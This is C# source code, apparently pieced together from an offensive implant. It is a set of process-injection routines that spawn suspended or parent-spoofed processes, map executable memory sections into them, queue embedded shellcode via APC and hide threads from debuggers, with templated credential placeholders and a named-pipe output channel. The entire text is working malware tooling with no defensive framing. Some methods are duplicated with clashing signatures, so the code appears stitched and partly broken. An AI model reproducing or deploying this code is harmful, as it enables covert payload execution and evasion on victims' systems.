public static IntPtr SetInformationThread(Natives.PROCESS_INFORMATION procInfo)
{
IntPtr th = procInfo.hThread;
IntPtr infoth = Natives.ZwSetInformationThread(th, 1, IntPtr.Zero, 0);
return(infoth);
}
public static int ResumeThread(Natives.PROCESS_INFORMATION procInfo)
{
IntPtr th = procInfo.hThread;
ulong outsupn = 0;
int rest = Natives.ZwAlertResumeThread(th, out outsupn);
return(rest);
}
public static bool SetInformationThread(Natives.PROCESS_INFORMATION procInfo)
{
IntPtr th = procInfo.hThread;
if (Natives.ZwSetInformationThread(th, (uint)Natives.SYSTEM_INFORMATION_CLASS.SystemProcessorInformation, IntPtr.Zero, 0) != 0)
{
return(false);
}
return(true);
}
public static bool QueueApcThread(IntPtr baseAddr, Natives.PROCESS_INFORMATION procInfo)
{
IntPtr th = procInfo.hThread;
if (Natives.ZwQueueApcThread(th, baseAddr, IntPtr.Zero) != 0)
{
return(false);
}
return(true);
}
public static bool CreateProcess(string processname, bool inheritHandler, ref Natives.PROCESS_INFORMATION procInfo)
{
Natives.STARTUPINFO startInfo = new Natives.STARTUPINFO();
if (!Natives.CreateProcess(IntPtr.Zero, processname, IntPtr.Zero, IntPtr.Zero, inheritHandler, Natives.CreateSuspended, IntPtr.Zero, IntPtr.Zero, ref startInfo, out procInfo))
{
return(false);
}
return(true);
}
static void Execute(string [] args)
{
var startInfo = new Natives.STARTUPINFO();
Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION();
Natives.LARGE_INTEGER largeinteger = new Natives.LARGE_INTEGER();
Natives.SYSTEM_INFO info = new Natives.SYSTEM_INFO();
startInfo.cb = (uint)Marshal.SizeOf(startInfo);
Natives.SECURITY_ATTRIBUTES pSec = new Natives.SECURITY_ATTRIBUTES();
Natives.SECURITY_ATTRIBUTES tSec = new Natives.SECURITY_ATTRIBUTES();
pSec.nLength = Marshal.SizeOf(pSec);
tSec.nLength = Marshal.SizeOf(tSec);
IntPtr section = IntPtr.Zero;
uint size = 0;
IntPtr baseAddr = IntPtr.Zero;
IntPtr viewSize = (IntPtr)size;
IntPtr soffset = IntPtr.Zero;
IntPtr baseAddrEx = IntPtr.Zero;
IntPtr viewSizeEx = (IntPtr)size;
IntPtr hToken = IntPtr.Zero;
IntPtr hProcTest = IntPtr.Zero;
IntPtr hTokenTest = IntPtr.Zero;
uint flags = Natives.CreateSuspended | Natives.CreateNoWindow;
try
{
if (Natives.CreateProcessWithLogonW("#USERNAME#", "#DOMAIN#", "#PASSWORD#", Natives.LogonFlags.NetCredentialsOnly, @"C:\Windows\System32\#SPAWN#", "", flags, (UInt32)0, "C:\\Windows\\System32", ref startInfo, out procInfo))
{
byte[] payload = DecompressDLL(Convert.FromBase64String(nutclr));
//Round payload size to page size
Natives.GetSystemInfo(ref info);
size = info.dwPageSize - (uint)payload.Length % info.dwPageSize + (uint)payload.Length;
largeinteger.LowPart = size;
//Crteate section in current process
var status = Natives.ZwCreateSection(ref section, Natives.GenericAll, IntPtr.Zero, ref largeinteger, Natives.PAGE_EXECUTE_READWRITE, Natives.SecCommit, IntPtr.Zero);
//Map section to current process
status = Natives.ZwMapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, IntPtr.Zero, IntPtr.Zero, soffset, ref viewSize, 1, 0, Natives.PAGE_EXECUTE_READWRITE);
if (baseAddr != IntPtr.Zero)
{
//Copy payload to current process section
Marshal.Copy(payload, 0, baseAddr, payload.Length);
//Map remote section
status = Natives.ZwMapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref viewSizeEx, 1, 0, Natives.PAGE_EXECUTE_READWRITE);
if (baseAddrEx != IntPtr.Zero && viewSizeEx != IntPtr.Zero)
{
//Unmap current process section
Natives.ZwUnmapViewOfSection(Natives.GetCurrentProcess(), baseAddr);
// Assign address of shellcode to the target thread apc queue
IntPtr th = procInfo.hThread;
IntPtr ptrq = Natives.ZwQueueApcThread(th, baseAddrEx, IntPtr.Zero);
Natives.ZwSetInformationThread(th, 1, IntPtr.Zero, 0);
//Before resuming the thread we write the stager on wnf
//so it can be read from the spawned process from other session
WriteWnF(task);
int rest = Natives.ZwResumeThread(th, out ulong outsupn);
}
else
{
Console.WriteLine("[x] Error mapping remote section");
File.WriteAllText(@"c:\temp\log.txt", "[x] Error mapping remote section");
}
}
else
{
Console.WriteLine("[x] Error mapping section to current process");
File.WriteAllText(@"c:\temp\log.txt", "[x] Error mapping section to current process");
}
Natives.CloseHandle(procInfo.hThread);
Natives.CloseHandle(procInfo.hProcess);
Natives.CloseHandle(hProcTest);
Natives.CloseHandle(hTokenTest);
}
else
{
Console.WriteLine("[x] Error creating process");
File.WriteAllText(@"c:\temp\log.txt", "[x] Error creating process " + Natives.GetLastError());
}
Natives.CloseHandle(hProcTest);
Natives.CloseHandle(hTokenTest);
}
catch (Exception e)
{
Console.WriteLine("[x] Generic error");
File.WriteAllText(@"c:\temp\log.txt", "[x] Generic error " + e.Message + " " + e.StackTrace);
}
}
public static bool OpenAndInject(int pid, byte[] payload)
{
IntPtr hproc = OpenProcess(pid);
//Round payload size to page size
uint size = InjectionHelper.GetSectionSize(payload.Length);
//Crteate section in current process
IntPtr section = IntPtr.Zero;
section = InjectionHelper.CreateSection(size, Natives.PAGE_EXECUTE_READWRITE);
if (section == IntPtr.Zero)
{
return(false);
}
//Map section to current process
IntPtr baseAddr = IntPtr.Zero;
IntPtr viewSize = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize, Natives.PAGE_EXECUTE_READWRITE);
if (baseAddr == IntPtr.Zero)
{
return(false);
}
//Copy payload to current process section
Marshal.Copy(payload, 0, baseAddr, payload.Length);
//Map remote section
IntPtr baseAddrEx = IntPtr.Zero;
IntPtr viewSizeEx = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, hproc, ref baseAddrEx, ref viewSizeEx, Natives.PAGE_EXECUTE_READWRITE);
if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero)
{
return(false);
}
if (!InjectionHelper.UnMapViewOfSection(baseAddr))
{
return(false);
}
IntPtr hNtdll = Natives.LoadLibrary("ntdll.dll");
IntPtr pExitUserThread = Natives.GetProcAddress(hNtdll, "RtlExitUserThread");
long offset = pExitUserThread.ToInt64() - hNtdll.ToInt64();
IntPtr pRemoteNtdll = GetRemoteModuleBaseAddress(pid, "ntdll.dll");
IntPtr pRemoteAddress = IntPtr.Add(pRemoteNtdll, (int)offset);
IntPtr hThread = IntPtr.Zero;
Natives.NtCreateThreadEx(out hThread, 0x1FFFFF, IntPtr.Zero, hproc, pRemoteAddress, IntPtr.Zero, true, 0, 0xffff, 0xffff, IntPtr.Zero);
if (hThread == IntPtr.Zero)
{
return(false);
}
Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION();
procInfo.hThread = hThread;
procInfo.hProcess = hproc;
// Assign address of shellcode to the target thread apc queue
if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo))
{
return(false);
}
InjectionHelper.ResumeThread(procInfo);
return(true);
}
public static bool SapwnAndInjectPPID(string binary, byte[] payload, int ppid)
{
Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION();
Natives.CreationFlags flags = Natives.CreationFlags.CREATE_SUSPENDED | Natives.CreationFlags.DETACHED_PROCESS
| Natives.CreationFlags.CREATE_NO_WINDOW | Natives.CreationFlags.EXTENDED_STARTUPINFO_PRESENT;
if (!Spawner.CreateProcess(binary, ppid, flags, ref procInfo))
{
return(false);
}
//Round payload size to page size
uint size = InjectionHelper.GetSectionSize(payload.Length);
//Crteate section in current process
IntPtr section = IntPtr.Zero;
section = InjectionHelper.CreateSection(size, Natives.PAGE_EXECUTE_READWRITE);
if (section == IntPtr.Zero)
{
return(false);
}
//Map section to current process
IntPtr baseAddr = IntPtr.Zero;
IntPtr viewSize = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize, Natives.PAGE_READWRITE);
if (baseAddr == IntPtr.Zero)
{
return(false);
}
//Copy payload to current process section
Marshal.Copy(payload, 0, baseAddr, payload.Length);
//Map remote section
IntPtr baseAddrEx = IntPtr.Zero;
IntPtr viewSizeEx = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, ref viewSizeEx, Natives.PAGE_EXECUTE);
if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero)
{
return(false);
}
if (!InjectionHelper.UnMapViewOfSection(baseAddr))
{
return(false);
}
// Assign address of shellcode to the target apc queue
if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo))
{
return(false);
}
InjectionHelper.ResumeThread(procInfo);
Natives.CloseHandle(procInfo.hThread);
Natives.CloseHandle(procInfo.hProcess);
return(true);
}
public static bool CreateProcessPCMPBNMBSAO(IntPtr hReadPipe, IntPtr hWritePipe, string processname, bool inheritHandler, ref Natives.PROCESS_INFORMATION procInfo)
{
Natives.SetHandleInformation(hReadPipe, Natives.HANDLE_FLAGS.INHERIT, 0);
Natives.STARTUPINFOEX sInfoEx = new Natives.STARTUPINFOEX();
sInfoEx.StartupInfo.hStdOutput = hWritePipe;
sInfoEx.StartupInfo.hStdErr = hWritePipe;
sInfoEx.StartupInfo.dwFlags = Natives.STARTF_USESTDHANDLES;
IntPtr lpValue = IntPtr.Zero;
Natives.SECURITY_ATTRIBUTES pSec = new Natives.SECURITY_ATTRIBUTES();
Natives.SECURITY_ATTRIBUTES tSec = new Natives.SECURITY_ATTRIBUTES();
pSec.nLength = Marshal.SizeOf(pSec);
tSec.nLength = Marshal.SizeOf(tSec);
IntPtr pntpSec = Marshal.AllocHGlobal(Marshal.SizeOf(pSec));
Marshal.StructureToPtr(pSec, pntpSec, false);
IntPtr pnttSec = Marshal.AllocHGlobal(Marshal.SizeOf(tSec));
Marshal.StructureToPtr(tSec, pnttSec, false);
IntPtr lpSize = IntPtr.Zero;
Natives.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);
sInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
Natives.InitializeProcThreadAttributeList(sInfoEx.lpAttributeList, 1, 0, ref lpSize);
Natives.DWORD64 policy = new Natives.DWORD64();
policy.dwPart1 = 0;
policy.dwPart2 = 0x1000;
lpValue = Marshal.AllocHGlobal(Marshal.SizeOf(policy));
Marshal.StructureToPtr(policy, lpValue, false);
Natives.UpdateProcThreadAttribute(sInfoEx.lpAttributeList, 0, (IntPtr)Natives.PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, lpValue, (IntPtr)Marshal.SizeOf(policy), IntPtr.Zero, IntPtr.Zero);
sInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(sInfoEx);
if (!Natives.CreateProcess(IntPtr.Zero, processname, IntPtr.Zero, IntPtr.Zero, inheritHandler, Natives.CreateSuspended | (uint)Natives.CreationFlags.EXTENDED_STARTUPINFO_PRESENT, IntPtr.Zero, IntPtr.Zero, ref sInfoEx, out procInfo))
{
return(false);
}
return(true);
}
public static bool CreateProcess(IntPtr hReadPipe, IntPtr hWritePipe, string processname, bool inheritHandler, ref Natives.PROCESS_INFORMATION procInfo)
{
Natives.SetHandleInformation(hReadPipe, Natives.HANDLE_FLAGS.INHERIT, 0);
var startInfo = new Natives.STARTUPINFO
{
hStdOutput = hWritePipe,
hStdErr = hWritePipe,
dwFlags = Natives.STARTF_USESTDHANDLES
};
if (!Natives.CreateProcess(IntPtr.Zero, processname, IntPtr.Zero, IntPtr.Zero, inheritHandler, Natives.CreateSuspended, IntPtr.Zero, IntPtr.Zero, ref startInfo, out procInfo))
{
return(false);
}
return(true);
}
public static bool CreateProcessWithLogonW(string username, string password, string domain, string path, string binary, string arguments, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION processInformation)
{
Natives.STARTUPINFO startupInfo = new Natives.STARTUPINFO();
startupInfo.cb = (uint)Marshal.SizeOf(typeof(Natives.STARTUPINFO));
if (!Natives.CreateProcessWithLogonW(username, domain, password,
Natives.LogonFlags.NetCredentialsOnly, path + binary, path + binary + " " + arguments, cf, 0, path, ref startupInfo, out processInformation))
{
return(false);
}
Console.WriteLine("Process created");
return(true);
}
public static bool CreateProcess(string processname, int ppid, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION procInfo)
{
Natives.STARTUPINFOEX sInfoEx = new Natives.STARTUPINFOEX();
sInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(sInfoEx);
IntPtr lpValue = IntPtr.Zero;
Natives.SECURITY_ATTRIBUTES pSec = new Natives.SECURITY_ATTRIBUTES();
Natives.SECURITY_ATTRIBUTES tSec = new Natives.SECURITY_ATTRIBUTES();
pSec.nLength = Marshal.SizeOf(pSec);
tSec.nLength = Marshal.SizeOf(tSec);
IntPtr pntpSec = Marshal.AllocHGlobal(Marshal.SizeOf(pSec));
Marshal.StructureToPtr(pSec, pntpSec, false);
IntPtr pnttSec = Marshal.AllocHGlobal(Marshal.SizeOf(tSec));
Marshal.StructureToPtr(tSec, pnttSec, false);
IntPtr lpSize = IntPtr.Zero;
Natives.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);
sInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
Natives.InitializeProcThreadAttributeList(sInfoEx.lpAttributeList, 1, 0, ref lpSize);
IntPtr parentHandle = Process.GetProcessById(ppid).Handle;
lpValue = Marshal.AllocHGlobal(IntPtr.Size);
Marshal.WriteIntPtr(lpValue, parentHandle);
Natives.UpdateProcThreadAttribute(sInfoEx.lpAttributeList, 0, (IntPtr)Natives.PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);
if (!Natives.CreateProcess(IntPtr.Zero, processname, pntpSec, pnttSec, false, (uint)cf, IntPtr.Zero, IntPtr.Zero, ref sInfoEx, out procInfo))
{
return(false);
}
return(true);
}
public static bool CreateProcessWithLogonW(string path, string binary, string arguments, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION processInformation)
{
string domain;
try
{
domain = Environment.UserDomainName;
}
catch (Exception)
{
domain = System.Environment.MachineName;
}
string username = Environment.UserName;
return(CreateProcessWithLogonW(username, "password", domain, path, binary, arguments, cf, ref processInformation));
}
public void ExecuteModule()
{
string output = "";
IntPtr hReadPipe = IntPtr.Zero;
IntPtr hWritePipe = IntPtr.Zero;
if (!Spawner.CreatePipe(ref hReadPipe, ref hWritePipe))
{
return;
}
Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION();
if (!Spawner.CreateProcess(hReadPipe, hWritePipe, this.processname, true, ref procInfo))
{
return;
}
string pipename = GetPipeName(procInfo.dwProcessId);
InjectionLoaderListener injectionLoaderListener = new InjectionLoaderListener(pipename, task);
byte[] payload = Utility.DecompressDLL(Convert.FromBase64String(Program.nutclr));
//Round payload size to page size
uint size = InjectionHelper.GetSectionSize(payload.Length);
//Crteate section in current process
IntPtr section = IntPtr.Zero;
section = InjectionHelper.CreateSection(size);
if (section == IntPtr.Zero)
{
return;
}
//Map section to current process
IntPtr baseAddr = IntPtr.Zero;
IntPtr viewSize = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize);
if (baseAddr == IntPtr.Zero)
{
return;
}
//Copy payload to current process section
Marshal.Copy(payload, 0, baseAddr, payload.Length);
//Map remote section
IntPtr baseAddrEx = IntPtr.Zero;
IntPtr viewSizeEx = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, ref viewSizeEx);
if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero)
{
return;
}
if (!InjectionHelper.UnMapViewOfSection(baseAddr))
{
return;
}
// Assign address of shellcode to the target thread apc queue
if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo))
{
return;
}
IntPtr infoth = InjectionHelper.SetInformationThread(procInfo);
if (infoth == IntPtr.Zero)
{
return;
}
InjectionHelper.ResumeThread(procInfo);
output = injectionLoaderListener.Execute(procInfo.hProcess, hReadPipe);
Natives.CloseHandle(procInfo.hThread);
Natives.CloseHandle(procInfo.hProcess);
SendResponse(output);
}
public static bool SapwnAndInject(string binary, byte[] payload)
{
Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION();
if (!Spawner.CreateProcess(binary, true, ref procInfo))
{
return(false);
}
//Round payload size to page size
uint size = InjectionHelper.GetSectionSize(payload.Length);
//Crteate section in current process
IntPtr section = IntPtr.Zero;
section = InjectionHelper.CreateSection(size);
if (section == IntPtr.Zero)
{
return(false);
}
//Map section to current process
IntPtr baseAddr = IntPtr.Zero;
IntPtr viewSize = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize);
if (baseAddr == IntPtr.Zero)
{
return(false);
}
//Copy payload to current process section
Marshal.Copy(payload, 0, baseAddr, payload.Length);
//Map remote section
IntPtr baseAddrEx = IntPtr.Zero;
IntPtr viewSizeEx = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, ref viewSizeEx);
if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero)
{
return(false);
}
if (!InjectionHelper.UnMapViewOfSection(baseAddr))
{
return(false);
}
// Assign address of shellcode to the target thread apc queue
if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo))
{
return(false);
}
IntPtr infoth = InjectionHelper.SetInformationThread(procInfo);
if (infoth == IntPtr.Zero)
{
return(false);
}
InjectionHelper.ResumeThread(procInfo);
Natives.CloseHandle(procInfo.hThread);
Natives.CloseHandle(procInfo.hProcess);
return(true);
}
